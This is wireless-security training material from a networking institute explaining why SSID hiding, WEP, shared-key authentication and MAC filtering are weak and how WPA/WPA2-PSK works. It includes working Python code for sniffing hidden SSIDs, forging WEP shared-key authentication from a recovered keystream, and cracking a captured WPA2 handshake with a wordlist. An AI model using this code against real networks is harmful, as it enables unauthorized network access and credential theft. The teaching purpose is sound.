Network Bulls
www.networkbulls.com
Best Institute for CCNA CCNP CCSP CCIP CCIE Training in India
M-44, Old Dlf, Sector-14 Gurgaon, Haryana, India
Call: +91-9654672192
By default, wireless security is nonexistent on access points and clients. The original 802.11
committee just didn’t imagine that wireless hosts would one day outnumber bounded media
hosts, but that’s truly where we’re headed. Also, and unfortunately, just as with the IPv4
routed protocol, engineers and scientists didn’t add security standards that are robust enough
to work in a corporate environment. So we’re left with proprietary solution add-ons to aid us
in our quest to create a secure wireless network. And no—I’m not just sitting here bashing the
standards committees. The security problems we’re experiencing were also created by the U.S.
government because of export issues with its own security standards. Our world is a complicated
place, so it follows that our security solutions are going to be as well.
A good place to start is by discussing the standard basic security that was added into the
original 802.11 standards and why those standards are way too flimsy and incomplete to
enable us to create a secure wireless network relevant to today’s challenges.
Open Access
All Wi-Fi Certified wireless LAN products are shipped in "open-access" mode, with their security
features turned off. While open access or no security may be appropriate and acceptable
for public hot spots such as coffee shops, college campuses, and maybe airports, it’s definitely
not an option for an enterprise organization, and likely not even adequate for your private
home network.
Security needs to be enabled on wireless devices during their installation in enterprise
environments. It may come as quite a shock, but some companies actually don’t enable any
WLAN security features. Obviously, the companies that do this are exposing their networks
to tremendous risk!
The reason that the products are shipped with open access is so that any person who
knows absolutely nothing about computers can just buy an access point, plug it into their
cable or DSL modem, and voilà, they're up and running. It's marketing, plain and simple,
and simplicity sells.
SSIDs, WEP, and MAC Address Authentication
What the original designers of 802.11 did to create basic security was include the use of Service
Set Identifiers (SSIDs), open or shared-key authentication, static Wired Equivalent Privacy
(WEP), and optional Media Access Control (MAC) address filtering. Sounds like a lot, but none
of these offers anything close to a serious security solution. At best they were marginally adequate
for a common home network, and today they aren't even that. But we'll go over them anyway…
An SSID is simply the network name shared by the devices that make up a WLAN. An access point
will only associate a client that presents its SSID, so it looks like an access control, but the
SSID is a name, not a secret. By default, an access point broadcasts its SSID in its beacon frames
many times a second. And even if SSID broadcasting is turned off (the beacon then carries an empty
SSID element), a bad guy can discover the SSID by monitoring the channel and just waiting for a
client to look for the access point. Why? Because the original 802.11 specifications require the
SSID to be sent in the clear in the client's probe request and association request and in the access
point's probe response, so every time a legitimate client connects, the "hidden" name is handed to
anyone listening.
If an AP has SSID broadcasting disabled, the client must be configured with the AP's SSID
in order to find it and connect. Such a client will then probe for that SSID by name wherever
it goes, which is exactly what a sniffer waits for.
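To make the point concrete, here is an added example (not from the original chapter) that builds a beacon from an access point with SSID broadcasting disabled, a probe request from a client configured for that network, and a small management-frame parser that pulls the SSID element out of both. The MAC addresses, the SSID "CorpWiFi" and the frame contents are constructed for the example; the layout (24-byte MAC header, 12 fixed bytes in beacons and probe responses, then tag-length-value information elements with element ID 0 for the SSID) is the one the standard defines.

```python
"""Where the SSID travels in the clear in 802.11 management frames (added example)."""
import struct

# Frame-control byte 0 = (subtype << 4) | (type << 2) | version; type 0 = management.
FC_PROBE_REQUEST, FC_PROBE_RESPONSE, FC_BEACON = 0x40, 0x50, 0x80
SUBTYPE_NAMES = {FC_PROBE_REQUEST: "probe-request",
                 FC_PROBE_RESPONSE: "probe-response",
                 FC_BEACON: "beacon"}
BROADCAST = b"\xff" * 6
SUPPORTED_RATES = b"\x82\x84\x8b\x96"  # 1, 2, 5.5, 11 Mbit/s, flagged as basic rates


def ie(element_id: int, payload: bytes) -> bytes:
    """One tag-length-value information element."""
    return bytes([element_id, len(payload)]) + payload


def mgmt_frame(fc0: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    """24-byte MAC header (frame control, duration, addr1, addr2, addr3, sequence) + body."""
    return bytes([fc0, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def beacon(bssid: bytes, ssid: bytes, hide_ssid: bool) -> bytes:
    """Beacon: 8-byte timestamp, 2-byte interval, 2-byte capability, then the IEs.
    'Hiding' the SSID only means sending the SSID element with zero length."""
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    body = fixed + ie(0, b"" if hide_ssid else ssid) + ie(1, SUPPORTED_RATES)
    return mgmt_frame(FC_BEACON, BROADCAST, bssid, bssid, body)


def probe_request(sta: bytes, ssid: bytes) -> bytes:
    """A client configured for a hidden network must name it in a directed probe request."""
    body = ie(0, ssid) + ie(1, SUPPORTED_RATES)
    return mgmt_frame(FC_PROBE_REQUEST, BROADCAST, sta, BROADCAST, body)


def extract_ssid(frame: bytes):
    """Return (subtype, source MAC, ssid) for a management frame; ssid is None when hidden."""
    fc0 = frame[0]
    if fc0 & 0x0C != 0x00:
        raise ValueError("not a management frame")
    subtype = SUBTYPE_NAMES.get(fc0, "subtype-%d" % (fc0 >> 4))
    src = ":".join("%02x" % b for b in frame[10:16])
    # Beacons and probe responses carry 12 fixed bytes before the information elements.
    offset = 24 + (12 if fc0 in (FC_BEACON, FC_PROBE_RESPONSE) else 0)
    while offset + 2 <= len(frame):
        element_id, length = frame[offset], frame[offset + 1]
        data = frame[offset + 2:offset + 2 + length]
        if element_id == 0:
            hidden = length == 0 or data == b"\x00" * length
            return subtype, src, None if hidden else data.decode("utf-8", "replace")
        offset += 2 + length
    return subtype, src, None


def sniff_for_ssid(frames):
    """What a passive sniffer learns: the first non-hidden SSID seen on the channel."""
    for frame in frames:
        subtype, src, ssid = extract_ssid(frame)
        if ssid is not None:
            return subtype, src, ssid
    return None


if __name__ == "__main__":
    ap, sta = bytes.fromhex("00111122aabb"), bytes.fromhex("001122334455")  # constructed
    captured = [beacon(ap, b"CorpWiFi", hide_ssid=True), probe_request(sta, b"CorpWiFi")]
    for f in captured:
        print(extract_ssid(f))
    print("sniffer learned:", sniff_for_ssid(captured))
```

The hidden beacon yields no name, but the very next frame, the client's probe request, carries "CorpWiFi" in element 0 with no encryption at all, because there is nothing in 802.11 that could encrypt a management frame before a client has even associated.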
Two types of authentication were specified by the IEEE 802.11 committee: open authentication
and shared-key authentication. Open authentication involves little more than supplying the
correct SSID (the AP accepts every request), and it's the most common method in use today. With
shared-key authentication, the access point sends the client device a 128-byte clear-text challenge
that the client must encrypt with the correct Wired Equivalent Privacy (WEP) key and return to the
access point. Without the correct key, authentication fails and the client won't be allowed to
associate with the access point. But shared-key authentication is not considered secure, and it's
actually worse than open authentication. WEP is built on the RC4 stream cipher, so the encrypted
response is just the challenge XORed with a keystream. An intruder who captures both the clear-text
challenge and its encrypted reply simply XORs the two to recover that keystream for the IV the client
used, and can then answer the AP's next challenge under the same IV without ever learning the WEP
key. The same recovered keystream also decrypts any data frame sent with that IV. Surprise: shared
key isn't used in today's WLANs precisely because of that clear-text challenge.
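The exchange just described, worked through as an added example rather than anything from the original chapter: a station answers a shared-key challenge with a WEP-encrypted reply, an attacker who saw only those two frames recovers the RC4 keystream for that IV, and then authenticates to the AP without knowing the key. The 40-bit key, the IV and the challenge bytes are constructed for the example; the RC4 seeding (IV prepended to the key), the CRC-32 integrity check value and the 128-byte challenge are as WEP and 802.11 define them.

```python
"""WEP shared-key authentication: recover the keystream, forge the next response (added example)."""
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || secret key, so a repeated IV
    under the same key yields the identical keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP's integrity check value: an unkeyed CRC-32, encrypted along with the data."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as it goes on the air: 3-byte IV in the clear, then RC4(IV||key, data||ICV)."""
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext, or None if the ICV doesn't check out."""
    iv, ciphertext = body[:3], body[3:]
    plaintext = rc4(iv + key, ciphertext)
    data, tag = plaintext[:-4], plaintext[-4:]
    return data if tag == icv(data) else None


# --- the legitimate exchange: AP challenge (clear) -> station response (WEP-encrypted) ---
def station_response(key: bytes, iv: bytes, challenge: bytes) -> bytes:
    return wep_encrypt(key, iv, challenge)


def ap_accepts(key: bytes, challenge: bytes, response: bytes) -> bool:
    return wep_decrypt(key, response) == challenge


# --- the attacker, who saw both frames but does not know the key ---
def recover_keystream(challenge: bytes, response: bytes) -> bytes:
    """Stream cipher: ciphertext XOR known plaintext = keystream for this IV."""
    return xor(challenge + icv(challenge), response[3:])


def forge_response(keystream: bytes, iv: bytes, new_challenge: bytes) -> bytes:
    """Answer a fresh challenge under the same IV; the station chooses the IV, so reuse is allowed."""
    return iv + xor(new_challenge + icv(new_challenge), keystream)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")        # constructed 40-bit key; the attacker never sees it
    iv = b"\x11\x22\x33"
    challenge_1 = bytes(range(128))          # 802.11 challenge text is 128 bytes
    seen_response = station_response(key, iv, challenge_1)  # captured from a real client
    keystream = recover_keystream(challenge_1, seen_response)
    challenge_2 = bytes(255 - b for b in range(128))         # AP's next challenge, to the attacker
    forged = forge_response(keystream, iv, challenge_2)
    print("forged response accepted:", ap_accepts(key, challenge_2, forged))
```

Note that the attacker never runs RC4 at all and never touches the key; reusing the station's IV is enough, and the CRC-32 integrity check offers no protection because it is computed by the attacker over plaintext the attacker chose.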
With open authentication, even if a client can complete authentication and associate with an
access point, WEP prevents the client from sending and receiving data through the access point
unless the client has the correct WEP key. A WEP secret key is either 40 bits or 104 bits long;
because the 24-bit initialization vector (IV) that is prepended to it gets counted in the marketing,
these are sold as "64-bit" and "128-bit" WEP. In its basic form, the key is statically defined by
the network administrator on the access point and on every client that communicates with it. When
static WEP keys are used, the administrator has the time-consuming task of entering the same keys on
every device in the WLAN, and of changing them everywhere whenever a device or an employee leaves.
Obviously, we now have fixes for this, because it would be administratively impossible in today's
huge corporate wireless networks!
Last, client MAC addresses can be statically typed into each access point, and any client that
shows up with a MAC address that isn't in the filter table is denied access. Sounds good, but of
course all MAC-layer header information is sent in the clear, even on an encrypted network. Anyone
equipped with a free wireless sniffer can read the source addresses of the client frames going to the
access point, wait for one of those clients to go quiet, and spoof its MAC address.
And don't let anyone tell you that WEP is fine as long as it's administered carefully. RC4 with a
24-bit IV starts reusing keystreams within hours on a busy network, and the published key-recovery
attacks (the ones AirSnort and its successors implement) pull a static WEP key out of captured traffic
in minutes, no matter how well that key is managed. So basic static WEP keys are no longer a viable
option in today's corporate networks without something stronger layered on top of them. So let's talk
about some of those fixes now.
WPA or WPA 2 Pre-Shared Key
Okay, now we’re getting somewhere. Although this is another form of basic security that’s
really just an add-on to the specifications, WPA or WPA2 Pre-Shared Key (PSK) is a better
form of wireless security than any other basic wireless security method mentioned so far.
I did say basic.
Wi-Fi Protected Access (WPA) is a standard developed in 2003 by the Wi-Fi Alliance,
formerly known as WECA. WPA provides a standard for authentication and encryption of
WLANs that's intended to solve the known security problems of WEP. The standard takes into account
the well-publicized AirSnort key-recovery and man-in-the-middle WLAN attacks. Of course, now we'll use
WPA2 to help us with today's security issues.
The PSK verifies users via a password or identifying code (also called a passphrase) of 8 to 63
characters configured on both the client machine and the access point. The passphrase itself is never
sent over the air: each side runs it, together with the SSID, through a key-derivation function (PBKDF2
with 4,096 iterations of HMAC-SHA1) to produce a 256-bit Pairwise Master Key (PMK), and a client only
gains access to the network if it can prove in the four-way handshake that it holds the same PMK as the
access point. The PSK also provides the keying material that TKIP or AES uses to generate the
per-session and per-packet encryption keys. While more secure than static WEP, PSK still has a lot in
common with static WEP in that the same secret is stored on every client station and can be
compromised if a station is lost or stolen, even though pulling the key out of a device isn't all that
easy to do. The bigger everyday risk is that anyone who records a client's four-way handshake can take
it away and try passphrases against it offline, so the PSK is only as strong as it is unguessable. It's
a definite recommendation to use a long PSK passphrase that includes a mixture of letters, numbers, and
nonalphanumeric characters, and to change it whenever a device that knows it leaves your control.
However, the fact that the PSK is static doesn't mean the encryption keys are: with WPA the session
and per-packet keys are derived fresh from the PMK and two random nonces every time a client
associates, and with 802.1X (WPA Enterprise) even the PMK is unique to each session.
The benefit of WPA over static WEP keys is that WPA's keys change dynamically
while the system is in use.
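Here is the whole PSK chain as an added example (not code from the original chapter): passphrase to PMK, PMK plus the two nonces to the Pairwise Transient Key, and the key-confirmation MIC that message 2 of the four-way handshake carries, followed by the offline dictionary attack that a captured handshake permits. The SSID, MAC addresses, nonces, passphrase and the stand-in EAPOL-Key bytes are constructed for the example; the PBKDF2 parameters, the 802.11i PRF and the HMAC-SHA1-128 MIC are as the standard defines them, and the "password"/"IEEE" value checked in the test is the standard's own published test vector.

```python
"""WPA/WPA2-PSK: passphrase -> PMK -> PTK -> handshake MIC, and the offline attack (added example)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key, fresh per association because both nonces are random.
    Layout: KCK (16) | KEK (16) | TK (32 for CCMP, plus 16 more for TKIP's MIC keys)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 Key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 128 bits.
    (WPA1 used HMAC-MD5 here.)"""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def client_handshake_mic(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed) -> bytes:
    """What the legitimate client puts in message 2 of the four-way handshake to prove it knows the PSK."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return eapol_mic(kck, eapol_zeroed)


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Offline attack on a captured handshake: everything but the passphrase went over the air in the clear."""
    for candidate in wordlist:
        try:
            mic = client_handshake_mic(candidate, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed)
        except ValueError:       # candidate outside the 8..63 range can't be a WPA passphrase
            continue
        if hmac.compare_digest(mic, captured_mic):
            return candidate
    return None


# Constructed scenario; every value below is made up for the example.
SSID = "CorpWiFi"
AP_MAC, STA_MAC = bytes.fromhex("00111122aabb"), bytes.fromhex("001122334455")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))            # real nonces are random
EAPOL_MSG2 = bytes([0x02, 0x03, 0x00, 0x75]) + b"\x00" * 117       # stand-in EAPOL-Key frame, MIC zeroed

if __name__ == "__main__":
    captured = client_handshake_mic("summer2011", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2)
    wordlist = ["password", "corpwifi1", "summer2011", "Welcome123"]
    print("recovered passphrase:",
          crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, captured, wordlist))
```

Two things worth noticing. The 4,096 PBKDF2 iterations are what make each guess cost something, but they are a fixed cost per candidate, so a passphrase that appears in a wordlist falls regardless; only length and unpredictability help. And because the SSID is the PBKDF2 salt, a network named after a default or popular SSID lets an attacker precompute PMKs for a whole wordlist once and reuse them against every network with that name. Tools such as aircrack-ng and hashcat do exactly what `crack_psk` does, at hardware speed.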
WPA is a step toward the IEEE 802.11i standard and uses many of the same components,
with the exception of encryption. WPA uses the Temporal Key Integrity Protocol (TKIP), which wraps
RC4 in per-packet key mixing and a keyed message integrity check so that it can run on existing WEP
hardware; 802.11i (WPA2) uses AES-CCMP encryption.
The IEEE 802.11i standard replaced Wired Equivalent Privacy (WEP) with a specific mode
of the Advanced Encryption Standard (AES) known as the Counter Mode with Cipher Block
Chaining Message Authentication Code (CBC-MAC) Protocol (CCMP). Counter mode encrypts the
payload, and CBC-MAC computes an authentication tag over the payload and the frame header, which is
how AES-CCMP provides both data confidentiality (encryption) and data integrity with a single key.
WPA’s mechanisms are designed to be implementable by current hardware vendors, meaning
that users should be able to implement WPA on their systems with only a firmware/software
modification.